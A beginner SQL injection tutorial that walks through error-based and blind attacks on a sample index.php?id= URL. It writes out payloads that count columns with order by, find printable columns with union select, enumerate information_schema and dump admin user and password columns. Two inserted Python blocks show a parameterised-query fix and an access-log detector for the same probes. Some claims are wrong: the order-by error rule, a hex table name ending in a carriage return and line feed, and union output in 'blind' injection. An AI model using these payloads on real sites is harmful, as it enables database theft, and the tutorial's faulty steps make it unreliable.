Basic SQLi



SQL Injection:

SQL injection is a code injection technique, used to attack data-driven applications in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).



Types :

[-]Error based
[-]Blind based

[1]Error based:

In error-based injection we use the errors thrown by the database to guide the injection.

Let me show an example:

Suppose we have a web app that has a database on the back end and it’s fetching data from it.

Like this website: www.website.com/index.php?id=84

?id=84 means it’s fetching something with the id 84 from a database and this is our way to communicate with the database.


So let’s go forward with these steps…


(1) Finding if it’s vulnerable.

Put a single quote at the end: www.website.com/index.php?id=84'

If you receive an error like “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use.” or something similar, the web app is vulnerable to SQL injection.

What’s so good about getting this error message? It means the database’s errors are reflected back to us, so we can use them as feedback.


(2) Joining queries.

Now, to append our own query, put --+ at the end like this: www.website.com/index.php?id=84' --+

The --+ turns the rest of the original query into a comment (the + becomes a space in the URL). Our query goes between the quote and the --+.


(3) Find the number of columns.

For this, we use the order by or group by clause to find the number of columns. But there are two possibilities: do we have to leave our single quote ( ' ) in here, or do we have to remove it?

How will I know?

Simple. Keep the tip below in mind:

Tip:
If the order clause is being parsed correctly and you ask for more columns than the query has, you’ll see an error like “Unknown column '100' in 'order clause'”.

This tells us whether we have to remove the ( ' ) or not.

Run the order clause with a guess at the maximum number of columns, like this: www.website.com/index.php?id=84' order by 100000000 --+

Do we get an error like this?

“Unknown column '100000000' in 'order clause'”

If not, we have to remove the ( ' ) from the link; otherwise it stays.

We’ll keep on guessing the number of columns. Dude, how will I know that I’ve guessed the right number of columns?

Simple.

- if you exceed it, the database gives an error like “Unknown column '100' in 'order clause'”

- if you are below it, you’ll see an error like “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use.”

- if you’re on the spot, there’s no error



Suppose:

1-www.website.com/index.php?id=84' order by 100 --+

Error: “Unknown column '100' in 'order clause'”

2-www.website.com/index.php?id=84' order by 8 --+

Error: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '”

This means that the number of columns is below 100 and greater than 8.

We try:
3-www.website.com/index.php?id=84' order by 10 --+

No error? Bingo. This is the number we wanted: we have 10 columns.
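To see why the step-3 error oracle exists and how a parameterised query removes it, here is an added example in Python against an in-memory SQLite table (not the page’s code; the pages table, the fetch_vulnerable/fetch_safe handlers and the probe strings are constructed for illustration). SQLite reports an out-of-range ORDER BY term instead of MySQL’s unknown-column message, but the behaviour is the same.

```python
import sqlite3

# Constructed stand-in for the page's index.php?id=84 back end (not the page's code).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT)")
    con.execute("INSERT INTO pages VALUES (84, 'Welcome', 'sample page body')")
    return con

def fetch_vulnerable(con, raw_id):
    """String concatenation: the quote, ORDER BY and comment all become SQL."""
    sql = "SELECT id, title, body FROM pages WHERE id = '" + raw_id + "'"
    try:
        return ("ok", con.execute(sql).fetchall())
    except sqlite3.Error as e:
        return ("error", str(e))  # the database error the walkthrough relies on

def fetch_safe(con, raw_id):
    """Parameterised query: raw_id is bound as one literal and never parsed as SQL."""
    rows = con.execute("SELECT id, title, body FROM pages WHERE id = ?", (raw_id,)).fetchall()
    return ("ok", rows)

# The URL forms from the walkthrough after decoding (the '+' in --+ is a space).
PROBES = {
    "normal":  "84",
    "quote":   "84'",
    "over":    "84' order by 100 -- ",  # more columns than the query has
    "on_spot": "84' order by 3 -- ",    # exactly the query's column count
    "blind":   "84' and 1=2 -- ",       # page content goes missing, no error
}

def compare(raw_id):
    """Run one probe through both handlers.
    Returns (vulnerable_status, vulnerable_rows, safe_status, safe_rows)."""
    con = make_db()
    v_status, v_rows = fetch_vulnerable(con, raw_id)
    s_status, s_rows = fetch_safe(con, raw_id)
    v_count = len(v_rows) if v_status == "ok" else 0
    return (v_status, v_count, s_status, len(s_rows))

if __name__ == "__main__":
    for name, probe in PROBES.items():
        print(f"{name:8} {compare(probe)}")
```

The concatenated handler answers the probes with error / no error exactly as step 3 describes, while the parameterised handler never errors and simply matches no row for anything that is not a plain id.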



(4) Finding vulnerable column.
We have to find out which columns print information onto the page. For that, we use union select. We’ll do a union select of 10 columns like this:
www.website.com/index.php?id=84' union select 1,2,3,4,5,6,7,8,9,10 --+

The vulnerable columns will be printed on the web app (e.g. if 3, 6 and 9 are vulnerable, those numbers will appear on the page. You can use any of them to print data; you can even use all of them.)

If nothing is printed, the real row for id 84 is taking up the space where our numbers would show, so some column stays hidden behind its content. Give an id that doesn’t exist so only our union row comes back: www.website.com/index.php?id=-84' union select 1,2,3,4,5,6,7,8,9,10 --+

Now that we’ve found the vulnerable columns, we’ll use them to print information from the database.



(5) Fetching data

Let’s use vulnerable column 3 to print the database name: www.website.com/index.php?id=84' union select 1,2,database(),4,5,6,7,8,9,10 --+


You can use other functions too, like user() to print the database user and version() to print the database version.

Let’s use vulnerable column 6 to print the table names in the database:
www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()--+

Suppose we got three tables:
admin, users, pages

Let’s use vulnerable column 6 to print the column names from the admin table. For this, we convert the table name to hex first, then put it after table_name= (hexed table name here):
www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a--+


Suppose we got the following columns:

user, pass

We can print data from them like this: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin--+



[2] Blind based:

With blind injection, nothing is printed on the web app when you add ( ' ) at the end of the URL. So how can I know that it’s vulnerable?

Easy.

If you add ( ' ) at the end of the URL and some text, object or picture goes missing from the page, then it’s vulnerable to blind injection.



(1) Finding if it’s vulnerable.

Put a single quote at the end: www.website.com/index.php?id=84'

Did things go missing? That means the web app is vulnerable to blind SQL injection.


(2) Joining queries.

For joining queries, put --+ at the end like this:

www.website.com/index.php?id=84' --+

Our query goes between the quote and the --+.



(3) Finding the number of columns.

For this, we use the order by or group by clause to find the number of columns.

There are two possibilities: do we have to leave our single quote ( ' ) in here, or should we remove it?

Tip: if adding --+ like this

www.website.com/index.php?id=84' --+

brings things back to normal, meaning all the content returns, then we need the ( ' ); otherwise remove it.

There are no error messages to go on here, so this is how we’ll know whether to remove the ( ' ) or not.

Run the order clause with a guess at the maximum number of columns. We’ll keep guessing the number of columns. How will I know that I’ve guessed the right number?

– if you exceed, the content is missing

– if you’re below, the content is missing

– if you’re on spot, then no content is missing 

Let’s take a look…

1-www.website.com/index.php?id=84' order by 100 --+

*Content is missing

It means the number of columns is below 100.

2-www.website.com/index.php?id=84' order by 8 --+

*Content is missing

It means that the number of columns is below 100 and greater than 8.

Try:
3-www.website.com/index.php?id=84' order by 10 --+

No content is missing? This is the number we wanted. We have 10 columns.



(4) Finding vulnerable columns


We have to find out by which column we can print information.

As above, we use union select: www.website.com/index.php?id=84' union select 1,2,3,4,5,6,7,8,9,10 --+

The vulnerable columns will be printed on the web app (e.g. if 3, 6 and 9 are vulnerable, they will be printed on the web app. You can use any or all of them.)



(5) Fetching data

Let’s use vulnerable column 3 to print the database name:
www.website.com/index.php?id=84' union select 1,2,database(),4,5,6,7,8,9,10 --+


Let’s use column 6 to print the table names in the database: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()--+

If we got three tables:
admin, users, pages

Let’s use column 6 to print the column names from the admin table. We have to convert the table name to hex first, then put it after table_name= (hexed table name here).

www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a--+


Suppose we got the following columns:

user, pass

We can print data from them like this: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin--+
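From the defending side, here is an added example (not from the original page) that scans web-server access-log lines for the probe sequence both sections walk through: the lone quote, the order by guesses, union select, information_schema lookups and the database()/user()/version() fingerprint calls. The log lines, client IPs and status codes are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines replaying the walkthrough against a hypothetical
# /index.php?id= parameter; addresses and status codes are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=84 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=84%27 HTTP/1.1" 500 211
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?id=84%27+order+by+100+--+ HTTP/1.1" 500 211
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?id=-84%27+union+select+1,2,3,4,5,6,7,8,9,10+--+ HTTP/1.1" 200 5321
203.0.113.5 - - [10/Oct/2023:13:55:58 +0000] "GET /index.php?id=84%27+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10+from+information_Schema.tables+where+table_Schema=database()--+ HTTP/1.1" 200 5400
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=12 HTTP/1.1" 200 4880
"""

# Common log format: client, ident, user, [time], "METHOD path PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# One indicator per step of the walkthrough, matched on the decoded query string.
INDICATORS = {
    "single_quote": re.compile(r"'"),
    "comment_terminator": re.compile(r"--(\s|$)"),          # --+ decodes to "-- "
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "db_fingerprint": re.compile(r"\b(database|user|version)\(\)", re.I),
}

def decoded_query(path):
    """URL-decode the query string; '+' becomes a space as the server sees it."""
    return unquote_plus(path.partition("?")[2])

def indicators_for(path):
    """Names of the indicators present in one request path, in INDICATORS order."""
    q = decoded_query(path)
    return [name for name, rx in INDICATORS.items() if rx.search(q)]

def scan(log_text):
    """Per-client summary: request count, flagged requests, indicator set, 5xx count."""
    summary = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.group(1), m.group(2), int(m.group(3))
        s = summary.setdefault(ip, {"requests": 0, "flagged": 0, "indicators": set(), "errors": 0})
        s["requests"] += 1
        found = indicators_for(path)
        if found:
            s["flagged"] += 1
            s["indicators"].update(found)
        if status >= 500:  # database errors surfacing as 5xx are the error-based signal
            s["errors"] += 1
    return summary
```

A client that accumulates a quote, then order by probes, then union select and information_schema in short succession is following this exact walkthrough; the 5xx responses alongside it are the server leaking the database errors the page relies on.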

 